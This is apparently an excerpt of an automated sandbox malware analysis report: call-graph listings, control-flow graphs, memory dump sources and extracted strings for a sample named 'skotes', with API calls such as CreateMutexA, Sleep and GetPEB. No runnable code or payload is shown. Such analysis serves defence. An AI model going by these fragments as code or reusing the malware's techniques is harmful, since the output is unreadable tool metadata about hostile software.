be4883 37159->37160 37161 be4afd 37160->37161 37162 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37160->37162 37163 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37161->37163 37217 be4f9c 37161->37217 37164 be489f 37162->37164 37165 be4b2f 37163->37165 37166 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37164->37166 37167 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37165->37167 37168 be48b7 37166->37168 37169 be4b44 37167->37169 37170 bd5c10 5 API calls 37168->37170 37171 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37169->37171 37172 be48be 37170->37172 37173 be4b56 37171->37173 37174 bd8580 2 API calls 37172->37174 37175 bdbe30 11 API calls 37173->37175 37176 be48ca 37174->37176 37177 be4b62 37175->37177 37176->37161 37179 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37176->37179 37178 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37177->37178 37180 be4b77 37178->37180 37181 be48e7 37179->37181 37182 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37180->37182 37184 bd5c10 5 API calls 37181->37184 37183 be4b8f 37182->37183 37185 bd5c10 5 API calls 37183->37185 37188 be48ef 37184->37188 37186 be4b96 37185->37186 37187 bd8580 2 API calls 37186->37187 37189 be4ba2 37187->37189 37190 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37188->37190 37191 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37189->37191 37246 be4e70 Concurrency::details::ContextBase::GetArbitraryAlias 37189->37246 37200 be4959 Concurrency::details::ContextBase::GetArbitraryAlias 37190->37200 37192 be4bbe 37191->37192 37193 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37192->37193 37194 be4bd6 37193->37194 37197 bd5c10 5 API calls 37194->37197 37195 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37195->37140 37196 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37198 be49e6 37196->37198 37199 be4bdd 37197->37199 37201 bd5c10 5 API calls 37198->37201 37202 bd8580 2 API calls 37199->37202 37200->37196 37206 be49ee 37201->37206 37203 be4be9 37202->37203 37204 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37203->37204 37203->37246 37205 be4c06 37204->37205 37207 bd5c10 5 API calls 37205->37207 37208 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37206->37208 37209 be4c0e 37207->37209 37210 be4a49 Concurrency::details::ContextBase::GetArbitraryAlias 37208->37210 37211 be4c5a 37209->37211 37212 be4f97 37209->37212 37210->37161 37268 bd98f0 37210->37268 37215 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37211->37215 37276 be8200 RtlAllocateHeap RtlAllocateHeap 37212->37276 37224 be4c78 Concurrency::details::ContextBase::GetArbitraryAlias 37215->37224 37216 be4ad5 37216->37161 37219 c075f6 __dosmaperr RtlAllocateHeap 37216->37219 37277 bec1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37217->37277 37222 be4ade 37219->37222 37220 be4cec Concurrency::details::ContextBase::GetArbitraryAlias 37225 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37220->37225 37221 be4fa6 37226 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37221->37226 37223 c08ab6 4 API calls 37222->37223 37223->37161 37224->37220 37224->37221 37227 be4d05 37225->37227 37228 be4fab 37226->37228 37229 bd5c10 5 API calls 37227->37229 37230 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37228->37230 37231 be4d0d 37229->37231 37230->37246 37232 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37231->37232 37234 be4d68 Concurrency::details::ContextBase::GetArbitraryAlias 37232->37234 37233 be4ddc Concurrency::details::ContextBase::GetArbitraryAlias 37235 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37233->37235 37234->37228 37234->37233 37236 be4df7 37235->37236 37237 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37236->37237 37238 be4e0c 37237->37238 37239 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37238->37239 37240 be4e27 37239->37240 37241 bd5c10 5 API calls 37240->37241 37242 be4e2e 37241->37242 37243 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37242->37243 37244 be4e67 37243->37244 37247 be4390 37244->37247 37246->37140 37246->37195 37248 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37247->37248 37249 be43d2 37248->37249 37250 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37249->37250 37251 be43e4 37250->37251 37252 bd8580 2 API calls 37251->37252 37253 be43ed 37252->37253 37254 be4646 37253->37254 37265 be43f8 Concurrency::details::ContextBase::GetArbitraryAlias 37253->37265 37255 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37254->37255 37256 be4657 37255->37256 37257 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37256->37257 37259 be466c 37257->37259 37258 be80c0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37258->37265 37260 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37259->37260 37263 be467e 37260->37263 37261 be4610 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37261->37246 37262 be9280 2 API calls 37262->37265 37264 be3640 13 API calls 37263->37264 37264->37261 37265->37258 37265->37261 37265->37262 37266 be7a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37265->37266 37278 be3640 37265->37278 37266->37265 37269 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37268->37269 37270 bd991e 37269->37270 37271 bd5c10 5 API calls 37270->37271 37273 bd9927 ListArray 37271->37273 37272 bd99c6 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37272->37216 37273->37272 37274 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37273->37274 37275 bd99f2 37274->37275 37277->37221 37279 be367f 37278->37279 37326 be3e6f Concurrency::details::ContextBase::GetArbitraryAlias 37278->37326 37280 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37279->37280 37281 be36b0 37280->37281 37282 be4327 37281->37282 37284 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37281->37284 37413 be8200 RtlAllocateHeap RtlAllocateHeap 37282->37413 37283 be4302 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37283->37265 37287 be36ff 37284->37287 37286 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37286->37326 37287->37282 37290 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37287->37290 37288 be432c 37414 be8200 RtlAllocateHeap RtlAllocateHeap 37288->37414 37292 be3743 37290->37292 37291 be4331 37293 be4336 37291->37293 37294 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37291->37294 37292->37282 37295 be3765 37292->37295 37296 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37293->37296 37294->37293 37297 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37295->37297 37298 be433b 37296->37298 37300 be3785 37297->37300 37415 be8200 RtlAllocateHeap RtlAllocateHeap 37298->37415 37302 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37300->37302 37301 be4340 37303 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37301->37303 37304 be3798 37302->37304 37305 be4345 37303->37305 37306 bd5c10 5 API calls 37304->37306 37307 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37305->37307 37310 be37a3 37306->37310 37308 be434a 37307->37308 37416 bec199 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37308->37416 37310->37288 37311 be37ef 37310->37311 37313 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37311->37313 37312 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37314 be4359 37312->37314 37315 be3811 37313->37315 37417 bec1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37314->37417 37315->37291 37317 be3845 Concurrency::details::ContextBase::GetArbitraryAlias 37315->37317 37318 bd98f0 5 API calls 37317->37318 37319 be3872 37318->37319 37320 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37319->37320 37325 be3c79 Concurrency::details::ContextBase::GetArbitraryAlias 37319->37325 37321 be3889 37320->37321 37322 bd5c10 5 API calls 37321->37322 37323 be3894 37322->37323 37324 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37323->37324 37328 be38dc Concurrency::details::ContextBase::GetArbitraryAlias 37324->37328 37325->37312 37325->37326 37326->37283 37326->37286 37327 be397e Concurrency::details::ContextBase::GetArbitraryAlias 37327->37298 37329 be39bd 37327->37329 37381 be3b49 Concurrency::details::ContextBase::GetArbitraryAlias 37327->37381 37328->37293 37328->37327 37331 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37329->37331 37330 c075f6 __dosmaperr RtlAllocateHeap 37332 be3b58 37330->37332 37333 be39da 37331->37333 37334 c08ab6 4 API calls 37332->37334 37409 bdad70 5 API calls 4 library calls 37333->37409 37335 be3b7a 37334->37335 37335->37308 37337 be3b89 37335->37337 37337->37314 37337->37325 37339 be3c8d 37337->37339 37340 be3e74 37337->37340 37341 be3ba2 37337->37341 37342 be3f42 37337->37342 37338 be3a77 Concurrency::details::ContextBase::GetArbitraryAlias 37343 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37338->37343 37347 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37339->37347 37345 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37340->37345 37344 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37341->37344 37348 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37342->37348 37346 be3a96 37343->37346 37350 be3bca 37344->37350 37351 be3e9c 37345->37351 37352 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37346->37352 37353 be3cb5 37347->37353 37354 be3f56 37348->37354 37349 be39e5 Concurrency::details::ContextBase::GetArbitraryAlias 37349->37301 37349->37338 37355 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37350->37355 37356 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37351->37356 37357 be3aa8 37352->37357 37358 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37353->37358 37359 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37354->37359 37360 be3be8 37355->37360 37361 be3eba 37356->37361 37410 bd49a0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 37357->37410 37363 be3cd3 37358->37363 37364 be3f6e 37359->37364 37365 bd5c10 5 API calls 37360->37365 37366 bd5c10 5 API calls 37361->37366 37367 bd5c10 5 API calls 37363->37367 37368 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37364->37368 37371 be3bef 37365->37371 37372 be3ec1 37366->37372 37369 be3cda 37367->37369 37370 be3f86 37368->37370 37374 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37369->37374 37375 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37370->37375 37376 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37371->37376 37373 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37372->37373 37377 be3ed9 37373->37377 37379 be3cef 37374->37379 37380 be3f98 37375->37380 37382 be3c07 37376->37382 37383 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37377->37383 37378 be3ab7 Concurrency::details::ContextBase::GetArbitraryAlias 37378->37305 37378->37381 37384 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37379->37384 37412 be2f10 13 API calls 4 library calls 37380->37412 37381->37330 37386 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37382->37386 37387 be3ef1 37383->37387 37388 be3d07 37384->37388 37389 be3c1f 37386->37389 37390 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37387->37390 37391 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37388->37391 37392 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37389->37392 37394 be3f09 37390->37394 37395 be3d1f 37391->37395 37393 be3c37 37392->37393 37396 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37393->37396 37397 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37394->37397 37398 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37395->37398 37399 be3c4f 37396->37399 37400 be3f21 37397->37400 37401 be3d37 37398->37401 37402 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37399->37402 37403 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37400->37403 37404 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37401->37404 37405 be3c67 37402->37405 37403->37405 37406 be3d49 37404->37406 37408 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37405->37408 37411 be1ec0 13 API calls 4 library calls 37406->37411 37408->37325 37409->37349 37410->37378 37411->37325 37412->37325 37417->37326 37418 bda682 GetFileAttributesA 37419 bda692 Concurrency::details::ContextBase::GetArbitraryAlias 37418->37419 37420 bda75d Concurrency::details::ContextBase::GetArbitraryAlias 37419->37420 37421 bda949 37419->37421 37424 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37420->37424 37422 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37421->37422 37423 bda94e 37422->37423 37425 bda953 Sleep CreateMutexA 37423->37425 37426 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37423->37426 37427 bda903 37424->37427 37430 bda98e 37425->37430 37426->37425 37429 bda9a7 37430->37429 37433 c06629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37430->37433 37432 bda9b0 37433->37432

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 438 bde530-bde843 call be7a00 call bd5c10 call be7a00 call bd5c10 call be9280 call be8320 call be8220 call be8320 call be7a00 * 3 call bdbe30 call be7a00 * 2 call bd5c10 call bd8580 476 bde8ce-bde9ec 438->476 477 bdea1a-bdea62 438->477 486 bdea99-bdeab2 call becff1 476->486 487 bde9f2-bde9fe 476->487 477->476 480 bdea8f-bdea96 call bed663 477->480 480->486 487->480 488 bdea04-bdea12 487->488 488->477 490 bdeab8-bdeda3 call c06c6a * 2 call be7a00 call bd5c10 call be83c0 call be8220 GetFileAttributesA call be7a00 call bd5c10 call be83c0 call be8220 GetFileAttributesA 488->490 521 bdeda9-bdee79 490->521 526 bdf5bb-bdf66c call be80c0 521->526 527 bdf273-bdf28b 521->527 526->527 531 bdf699-bdf6a0 call bed663 526->531 529 bdf291-bdf29d 527->529 530 bdf6a3-bdf6b6 527->530 529->531 532 bdf2a3-bdf2b1 529->532 531->530 532->526 534 bdf6cb-bdf962 call c06c6a call be7a00 call bd5c10 call be7a00 * 4 call bde530 call be80c0 call be7a00 call be80c0 * 2 532->534 570 bdf98c-bdf9a5 call becff1 534->570 571 bdf964-bdf970 534->571 573 bdf982-bdf989 call bed663 571->573 574 bdf972-bdf980 571->574 573->570 574->573 576 bdf9ab-bdfb15 call c06c6a call be7a00 call bd5c10 call be7a00 * 4 call bde530 574->576 600 bdfb3f-bdfb4e 576->600 601 bdfb17-bdfb23 576->601 602 bdfb35-bdfb3c call bed663 601->602 603 bdfb25-bdfb33 601->603 602->600 603->602 604 bdfb4f-bdfc6f call c06c6a call be7a00 call bd9580 call bd9230 call be8320 603->604 620 bdfc70-bdfc75 604->620 620->620 621 bdfc77-be0860 call be80c0 call be7a00 * 2 call bdc360 call c06729 call be7a00 call bd5c10 call be7a00 * 4 call bde530 620->621 656 be088a-be08a5 call becff1 621->656 657 be0862-be086e 621->657 658 be0880-be0887 call bed663 657->658 659 be0870-be087e 657->659 658->656 659->658 661 be08ce-be15f2 call c06c6a call be7a00 call bd5c10 call be7a00 * 4 call bde530 659->661
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                                                                                              • API String ID: 0-2571795437
                                                                                                                                                                                                                                              • Opcode ID: 261301e9ffdd1cdd7279cdd9bf20b138083016fa6aaaa0487dbd78fd9518ef0b
                                                                                                                                                                                                                                              • Instruction ID: e8aa58919117d838c16f8cf802e3fa106eae8f8ed73cd41c6204148333d86609
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 261301e9ffdd1cdd7279cdd9bf20b138083016fa6aaaa0487dbd78fd9518ef0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C82D2709142889BEF14EF68C9497DEBFF6EB01304F508599E8152B3C2D7759A88CBD2

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2266 c12517-c1253f call c12133 call c12191 2271 c126e5-c1271a call c06c87 call c12133 call c12191 2266->2271 2272 c12545-c12551 call c12139 2266->2272 2298 c12720-c1272c call c12139 2271->2298 2299 c12842-c1289e call c06c87 call c162ee 2271->2299 2272->2271 2277 c12557-c12562 2272->2277 2279 c12564-c12566 2277->2279 2280 c12598-c125a1 call c0adf5 2277->2280 2282 c12568-c1256c 2279->2282 2293 c125a4-c125a9 2280->2293 2285 c12588-c1258a 2282->2285 2286 c1256e-c12570 2282->2286 2291 c1258d-c1258f 2285->2291 2289 c12572-c12578 2286->2289 2290 c12584-c12586 2286->2290 2289->2285 2295 c1257a-c12582 2289->2295 2290->2291 2296 c126e1-c126e4 2291->2296 2297 c12595 2291->2297 2293->2293 2294 c125ab-c125cc call c0b04b call c0adf5 2293->2294 2294->2296 2314 c125d2-c125d5 2294->2314 2295->2282 2295->2290 2297->2280 2298->2299 2308 c12732-c1273e call c12165 2298->2308 2316 c128a0-c128a6 2299->2316 2317 c128a8-c128ab 2299->2317 2308->2299 2315 c12744-c12765 call c0adf5 GetTimeZoneInformation 2308->2315 2318 c125d8-c125dd 2314->2318 2328 c12820-c12841 call c1212d call c12121 call c12127 2315->2328 2329 c1276b-c1278c 2315->2329 2320 c128ee-c12900 2316->2320 2317->2320 2321 c128ad-c128bd call c0b04b 2317->2321 2318->2318 2322 c125df-c125f1 call c0a1f1 2318->2322 2324 c12910 2320->2324 2325 c12902-c12905 2320->2325 2339 c128c7-c128e0 call c162ee 2321->2339 2340 c128bf 2321->2340 2322->2271 2341 c125f7-c1260a call c14b17 2322->2341 2333 c12915-c1292a call c0adf5 call becff1 2324->2333 2334 c12910 call c126f2 2324->2334 2325->2324 2330 c12907-c1290e call c12517 2325->2330 2335 c12796-c1279d 2329->2335 2336 c1278e-c12793 2329->2336 2330->2333 2334->2333 2343 c127af-c127b1 2335->2343 2344 c1279f-c127a6 2335->2344 2336->2335 2358 c128e2-c128e3 2339->2358 2359 c128e5-c128eb call c0adf5 2339->2359 2347 c128c0-c128c5 call c0adf5 2340->2347 2341->2271 2363 c12610-c12613 2341->2363 2352 c127b3-c127dc call c0ef17 call c0e926 2343->2352 2344->2343 2351 c127a8-c127ad 2344->2351 2368 c128ed 2347->2368 2351->2352 2379 c127ea-c127ec 2352->2379 2380 c127de-c127e1 2352->2380 2358->2347 2359->2368 2369 c12615-c12619 2363->2369 2370 c1261b-c12621 2363->2370 2368->2320 2369->2363 2369->2370 2371 c12623 2370->2371 2372 c12624-c12631 call c08bbe 2370->2372 2371->2372 2383 c12634-c12639 2372->2383 2382 c127ee-c1280c call c0e926 2379->2382 2380->2379 2381 c127e3-c127e8 2380->2381 2381->2382 2389 c1281b-c1281e 2382->2389 2390 c1280e-c12811 2382->2390 2385 c12642-c12643 2383->2385 2386 c1263b-c12640 2383->2386 2385->2383 2386->2385 2388 c12645-c12648 2386->2388 2391 c12696-c12699 2388->2391 2392 c1264a-c12661 call c08bbe 2388->2392 2389->2328 2390->2389 2393 c12813-c12819 2390->2393 2394 c126a0-c126b4 2391->2394 2395 c1269b-c1269d 2391->2395 2401 c12663 2392->2401 2402 c12675-c12677 2392->2402 2393->2328 2397 c126b6-c126c6 call c14b17 2394->2397 2398 c126ca 2394->2398 2395->2394 2397->2271 2409 c126c8 2397->2409 2403 c126cd-c126df call c1212d call c12121 2398->2403 2405 c12665-c1266a 2401->2405 2402->2391 2407 c12679-c12689 call c08bbe 2402->2407 2403->2296 2405->2402 2410 c1266c-c12673 2405->2410 2415 c12690-c12694 2407->2415 2409->2403 2410->2402 2410->2405 2415->2391 2416 c1268b-c1268d 2415->2416 2416->2391 2417 c1268f 2416->2417 2417->2415
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C26758), ref: 00C1275C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
